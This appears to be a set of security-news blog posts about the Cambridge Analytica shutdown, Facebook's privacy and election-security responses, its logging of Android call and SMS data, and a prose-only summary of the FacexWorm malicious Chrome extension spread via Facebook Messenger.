Cambridge Analytica is shutting down after Facebook privacy scandal, is it true?

Cambridge Analytica is shutting down after Facebook privacy scandal, is it true?

Cambridge Analytica, the commercial data analytics company at the centre of the Facebook privacy scandal, is ceasing all operations.

Cambridge Analytica, the commercial data analytics company at the centre of the Facebook privacy scandal, is ceasing all operations.

The commercial data analytics company Cambridge Analytica that was the protagonist of the biggest privacy scandal of the last years has announced it is “ceasing all operations” following the Facebook data breach.

An official statement released by the company states it had been “the subject of numerous unfounded accusations” and was “vilified for activities that are not only legal, but also widely accepted as a standard component of online advertising in both the political and commercial arenas.”

The firm has used data harvested by Facebook to target US voters in the 2016 Presidential election.

The data were collected by a group of academics that then shared it with the firm Cambridge Analytica, a news that was later confirmed by Facebook. The researchers used an app developed by the University of Cambridge psychology lecturer, Dr. Aleksandr Kogan, to collect user data.

Cambridge Analytica always denied any involvement with Trump’s campaign has declared that it never use collected data to influence the Presidential election.

Early April, Facebook revealed that 87 million users have been affected by the Cambridge Analytica case, much more than 50 million users initially thought.

In the wake of the scandal, Facebook decided to tighten its privacy restrictions.

“Over the past several months, Cambridge Analytica has been the subject of numerous unfounded accusations and, despite the company’s efforts to correct the record, has been vilified for activities that are not only legal, but also widely accepted as a standard component of online advertising in both the political and commercial arenas,” said Clarence Mitchell, a spokesman for Cambridge Analytica.

Facebook- Cambridge Analytica

“Despite Cambridge Analytica’s unwavering confidence that its employees have acted ethically and lawfully, which view is now fully supported by Mr Malins’ report (independent investigator Julian Malins), the siege of media coverage has driven away virtually all of the company’s customers and suppliers.” continued the announcement issued today by the data analytics company.

“As a result, it has been determined that it is no longer viable to continue operating the business, which left Cambridge Analytica with no realistic alternative to placing the company into administration.”

While Cambridge Analytica declared it would have helped the UK authorities in investigating into the Facebook scandal, last month, the Information Commissioner Elizabeth Denham declared that the company failed to meet a deadline to produce the information requested by the authorities.

According to the official statement published by Cambridge Analytica on its website, its parent company SCL Elections was also commencing bankruptcy proceedings.

Journalists and experts are skeptical about the decision of the companies to shut down.

“The chair of a UK parliament committee investigating the firm’s activities also raised concerns about Cambridge Analytica and SCL Elections’ move.” reported the BBC.

“They are party to very serious investigations and those investigations cannot be impeded by the closure of these companies,” said Damian Collins MP.

“I think it’s absolutely vital that the closure of these companies is not used as an excuse to try and limit or restrict the ability of the authorities to investigate what they were doing.”

Is this the end of the story?

No, of course, let me close with this statement published by The Guardian about the future projects of Alexander Nix and his collaborators.

“Although Cambridge Analytica might be dead, the team behind it has already set up a mysterious new company called Emerdata. According to Companies House data, Alexander Nix is listed as a director along with other executives from SCL Group. The daughters of the billionaire Robert Mercer are also listed as directors.” reads The Guardian.

FacexWorm targets cryptocurrency users and spreads through Facebook Messenger

FacexWorm targets cryptocurrency users and spreads through Facebook Messenger

Social networks could be a privileged attack vector to rapidly spread a malware to a huge audience, FacexWorm targets cryptocurrency users by spreading through Facebook Messenger.

Social networks could be a privileged attack vector to rapidly spread a malware to a huge audience.

In the last hours, a new threat is spreading through leveraging an apparently harmful link for a video sent by a friend on Facebook messenger.

Security researchers from Trend Micro have spotted a malicious Chrome extension, dubbed FacexWorm, which is spreading through Facebook Messenger and targeting users of cryptocurrency trading platforms to steal their accounts’ credentials and run cryptocurrency mining scripts.

“Our Cyber Safety Solutions team identified a malicious Chrome extension we named FacexWorm, which uses a miscellany of techniques to target cryptocurrency trading platforms accessed on an affected browser and propagates via Facebook Messenger.” reads the report published by Trend Micro.

According to the experts, FacexWorm was first detected in late April and appears to be linked to two other Facebook Messenger spam campaigns, one that occurred in August 2017 and a second one that was launched in December 2017 to spread the Digmine cryptocurrency miner.

Experts recently observed a spike in FacexWorm activity, the malicious code was detected in several countries, including GermanyTunisiaJapanTaiwanSouth Korea, and Spain.

FacexWorm implements several features, including stealing account credentials from websites, like Google and cryptocurrency sites, redirecting victims to rogue cryptocurrency sites, injecting cryptocurrency miners, and redirecting victims to the attacker’s referral link for cryptocurrency-related referral programs.

The following image shows the FacexWorm’s infection chain:


FacexWorm propagates by links over Facebook Messenger to the friends of an affected Facebook account to redirect users to fake versions of popular video streaming websites, including YouTube. The user is encouraged to download a malicious Chrome extension as a codec extension to continue playing the video and to grant all extended permissions to complete the installation, with this trick malware can have full control for any websites the user visits.

Currently the malicious extension only Chrome users, when the malware detects a different browser it redirects the user to an innocuous-looking advertisement.

“FacexWorm is delivered through socially engineered links sent to Facebook Messenger. The links redirect to a fake YouTube page that will ask unwitting users to agree and install a codec extension (FacexWorm) in order to play the video on the page. It will then request privilege to access and change data on the opened website.” continues the report.


Once FacexWorm Chrome extension is installed on the victim’s PC, it downloads more modules from its command and control server to perform other malicious activities.

“FacexWorm is a clone of a normal Chrome extension but injected with short code containing its main routine. It downloads additional JavaScript code from the C&C server when the browser is opened,” continues the report.

“Every time a victim opens a new webpage, FacexWorm will query its C&C server to find and retrieve another JavaScript code (hosted on a Github repository) and execute its behaviors on that webpage.”

Trend Micro detailed the malicious behaviors of the malware that include:

  • Steal the user’s account credentials for Google, MyMonero, and Coinhive.
  • Push a cryptocurrency scam. 
  • Conduct malicious web cryptocurrency mining.
  • Hijack cryptocurrency-related transactions.
  • Earn from cryptocurrency-related referral programs.
Facebook: Cambridge Analytica scandal affected 87 Million users

Facebook: Cambridge Analytica scandal affected 87 Million users

Facebook revealed on Wednesday that 87 million users have been affected by the Cambridge Analytica case, much more than 50 million users initially thought.

The social network giant recently unveiled clearer terms of service to ensure transparency to its users about data sharing.

Facebook’s chief technology officer Mike Schroepfer provided further details on the case, including new estimations for the number of affected users.

“In total, we believe the Facebook information of up to 87 million people — mostly in the US — may have been improperly shared with Cambridge Analytica,” Schroepfer said.

The CTO also explained how Facebook is implementing new privacy tools for its users that would be available by next week.

“People will also be able to remove apps that they no longer want. As part of this process we will also tell people if their information may have been improperly shared with Cambridge Analytica,” he added.

“Overall, we believe these changes will better protect people’s information while still enabling developers to create useful experiences.”

Facebook- Cambridge Analytica

Next week, on April 11, Facebook founder Mark Zuckerberg would appear at the Congress to address privacy issues.

The hearing will “be an important opportunity to shed light on critical consumer data privacy issues and help all Americans better understand what happens to their personal information online,” said the committee’s Republican chairman Greg Walden and ranking Democrat Frank Pallone in a statement.

“We appreciate Mr. Zuckerberg’s willingness to testify before the committee, and we look forward to him answering our questions.”

The situation for Facebook could get worse after these last revelations, a few days ago Zuckerberg said it would take “a few years” to fix the problems uncovered by the revelations on data misuse.

Zuckerberg tried to reinforce the positive image of its firms, sustaining that one of the biggest error he made is that Facebook is “idealistic,” the

“Well, I don’t think it’s going to take 20 years. I think the basic point that you’re getting at is that we’re really idealistic. When we started, we thought about how good it would be if people could connect, if everyone had a voice. Frankly, we didn’t spend enough time investing in, or thinking through, some of the downside uses of the tools. So for the first 10 years of the company, everyone was just focused on the positive.” Zuckerberg told

“I think now people are appropriately focused on some of the risks and downsides as well. And I think we were too slow in investing enough in that. It’s not like we did nothing. I mean, at the beginning of last year, I think we had 10,000 people working on security. But by the end of this year, we’re going to have 20,000 people working on security.” 

In response to the Cambridge Analytica case, Facebook deleted dozens of accounts linked to Russia that were used to spread propaganda.

Facebook announced to have revoked the accounts of 70 Facebook and 65 Instagram accounts and removed 138 Facebook pages controlled by the Russia-based Internet Research Agency (IRA), also known as the Russian troll farm due to its misinformation campaigns.

The unit “has repeatedly used complex networks of inauthentic accounts to deceive and manipulate people who use Facebook, including before, during and after the 2016 US presidential elections,” explained Facebook chief security officer Alex Stamos.

Zuckerberg added that the Russian agency“has been using complex networks of fake accounts to deceive people.”

“While we respect people and governments sharing political views on Facebook, we do not allow them to set up fake accounts to do this. When an organization does this repeatedly, we take down all of their pages, including ones that may not be fake themselves.”

After Cambridge Analytica scandal Facebook announces Election security Improvements

After Cambridge Analytica scandal Facebook announces Election security Improvements

After Cambridge Analytica case, 

Facebook announced security improvements to prevent future interference with elections.

Facebook is under the fire after the revelation of the Cambridge Analytica case and its role in the alleged interference to the 2016 US presidential election.

While the analysts are questioning about the interference with other events, including the Brexit vote, Facebook is now looking to prevent such kind of operations against any kind of election.

Guy Rosen, Facebook VP of Product Management declared that everyone is responsible for preventing the same kind of attack to the democracy and announced the significant effort Facebook will spend to do it.

“By now, everyone knows the story: during the 2016 US election, foreign actors tried to undermine the integrity of the electoral process. Their attack included taking advantage of open online platforms — such as Facebook — to divide Americans, and to spread fear, uncertainty and doubt,” said Guy Rosen.

“Today, we’re going to outline how we’re thinking about elections, and give you an update on a number of initiatives designed to protect and promote civic engagement on Facebook.”

Facebook plans to improve the security of elections in four main areas: combating foreign interference, removing fake accounts, increasing ads transparency, and reducing the spread of false news.

Alex Stamos, Facebook’s Chief Security Officer, added that the company always fight “fake news,” explaining that the term is used to describe many malicious activities including:

  1. Fake identities– this is when an actor conceals their identity or takes on the identity of another group or individual;
  2. Fake audiences– so this is using tricks to artificially expand the audience or the perception of support for a particular message;
  3. False facts – the assertion of false information; and
  4. False narratives– which are intentionally divisive headlines and language that exploit disagreements and sow conflict. This is the most difficult area for us, as different news outlets and consumers can have completely different on what an appropriate narrative is even if they agree on the facts.

“When you tease apart the overall digital misinformation problem, you find multiple types of bad content and many bad actors with different motivations.” said Alex Stamos.

“Once we have an understanding of the various kinds of “fake” we need to deal with, we then need to distinguish between motivations for spreading misinformation. Because our ability to combat different actors is based upon preventing their ability to reach these goals.” said Stamos.

“Each country we operate in and election we are working to support will have a different range of actors with techniques are customized for that specific audience. We are looking ahead, by studying each upcoming election and working with external experts to understand the actors involved and the specific risks in each country.”

Stamos highlighted the importance to profile the attackers, he distinguished profit-motivated organized group, ideologically motivated groups, state-sponsored actors, people that enjoy causing chaos and disruption, and groups having multiple motivations such as ideologically driven groups.

Facebook is working to distinguish between motivations for spreading misinformation and implement the necessary countermeasures.


Currently, Facebook already spends a significant effort in combatting fake news and any interference with elections.

Samidh Chakrabarti, Product Manager, Facebook, explained that the social media giant is currently blocking millions of fake accounts each day with a specific focus on those pages that are created to spread inauthentic civic content.

Chakrabarti explained that pages and domains that are used to share fake news is increasing, in response, Facebook doubles the number of people working on safety issues from 10,000 to 20,000. This hard job is mainly possible due to the involvement of sophisticated machine learning systems.

“Over the past year, we’ve gotten increasingly better at finding and disabling fake accounts. We’re now at the point that we block millions of fake accounts each day at the point of creation before they can do any harm.” said Chakrabarti.

“Rather than wait for reports from our community, we now proactively look for potentially harmful types of election-related activity, such as Pages of foreign origin that are distributing inauthentic civic content. If we find any, we then send these suspicious accounts to be manually reviewed by our security team to see if they violate our Community Standards or our Terms of Service. And if they do, we can quickly remove them from Facebook. “

But we all know that Facebook is a business that needs to increase profits, for this reason ads are very important for it.

Facebook is building a new transparency feature for the ads on the platform, dubbed View Ads, that is currently in testing in Canada. View Ads allows anyone to view all the ads that a Facebook Page is running on the platform.

“you can click on any Facebook Page, and select About, and scroll to View Ads.” explained Rob Leathern, Product Management Director.

“Next we’ll build on our ads review process and begin authorizing US advertisers placing political ads. This spring, in the run up to the US midterm elections, advertisers will have to verify and confirm who they are and where they are located in the US,”

This summer, Facebook will launch a public archive with all the ads that ran with a political label.

Stay tuned ….

Facebook collected call and SMS data from Android users if not explicitly forbidden

Facebook collected call and SMS data from Android users if not explicitly forbidden

After the Cambridge Analytica scandal, Facebook made the headlines again, the company collected users’ Android call and SMS metadata for years.

The Cambridge Analytica case it raised the discussion about the power of social networks and the possibility of their abuse for the conditioning of political activities.
The non-professionals have discovered how important their digital experience is and how companies specialized in data analysis operate without their knowledge.

Social network platforms have an impressive quantity of information about and are able not only to profile us but also to influence our choice.
Six years ago I was banned by the “democratic” Wikipedia because I coined a term that described how it is possible to manipulate social network, the voice “Social network poisoning,” was deleted by Wikipedia English but it is still present in Wikipedia Italian version.

Give a look at the translated version … and if you have friends at Wikipedia tell them that was an error to ban me

Back to the present, many of you probably still don’t know that if you have installed Facebook Messenger app on your Android device, there are chances that the social network giant had been collecting your data (the start time for each call, the duration, and the contact’s name), including contacts, SMS data but not the text, and call history data at least until late last year.

The Facebook Messenger app logged phone call data only related to numbers saved in the phone’s address book. Facebook was collecting such kind of data, this is not a surprise for tech-savvy people because we have discussed it in the past.

In January, the popular Italian expert Simone Margaritelli wrote a blog post (Italian) on Medium inviting users to uninstall  Facebook and Whatsapp.

The programmer Dylan McKay was able to find data, including logs of calls and SMS messages, in an archive he downloaded (as a ZIP file) from Facebook.

Mat Johnson, a Professor at the University of Houston Creative Writing Program, also made the same disturbing discovery.

The Cambridge Analytica case has is giving users another point of view regarding the collection of such kind of data made by Facebook and the real way they are using for.

A Facebook spokesperson explained that the platform collects this data to improve the users’ experience. collection data.png

“This [above] screen in the Messenger application offers to conveniently track all your calls and messages. But Facebook was already doing this surreptitiously on some Android devices until October 2017, exploiting the way an older Android API handled permissions.” wrote Sean Gallagher, Ars Technica’s IT and National Security Editor.

“Facebook began explicitly asking permission from users of Messenger and Facebook Lite to access SMS and call data to “help friends find each other” after being publicly shamed in 2016 over the way it handled the “opt-in” for SMS services. That message mentioned nothing about retaining SMS and call data, but instead it offered an “OK” button to approve “keeping all of your SMS messages in one place.””

Facebook denied to collect call data surreptitiously with an official blog post, the social network giant highlighted that it never commercialized the data and that users are in total control of the data uploaded to the platform.

“When you sign up for Messenger or Facebook Lite on Android, or log into Messenger on an Android device, you are given the option to continuously upload your contacts as well as your call and text history.” reads the blog post published by Facebook. “For Messenger, you can either turn it on, choose ‘learn more’ or ‘not now’. On Facebook Lite, the options are to turn it on or ‘skip’. If you chose to turn this feature on, we will begin to continuously log this information, which can be downloaded at any time using the Download Your Information tool.”

Users can check data collected by Facebook going to your Facebook Settings→Download a copy of your Facebook data→Start My Archive.

Facebook collection data

“Call and text history logging is part of an opt-in feature for people using Messenger or Facebook Lite on Android. This helps you find and stay connected with the people you care about, and provide you with a better experience across Facebook. People have to expressly agree to use this feature. If, at any time, they no longer wish to use this feature they can turn it off in settings, or here for Facebook Lite users, and all previously shared call and text history shared via that app is deleted. While we receive certain permissions from Android, uploading this information has always been opt-in only.” continues Facebook.

If you want to stop Facebook from continuously upload your contacts to its server, you can turn off the uploading feature in the Messenger app. In this way, all previously uploaded contacts will be deleted.

iOS users are not affected by this issue.

Lesson leaned … every time we use an app it is essential to carefully read the documentation that details its work.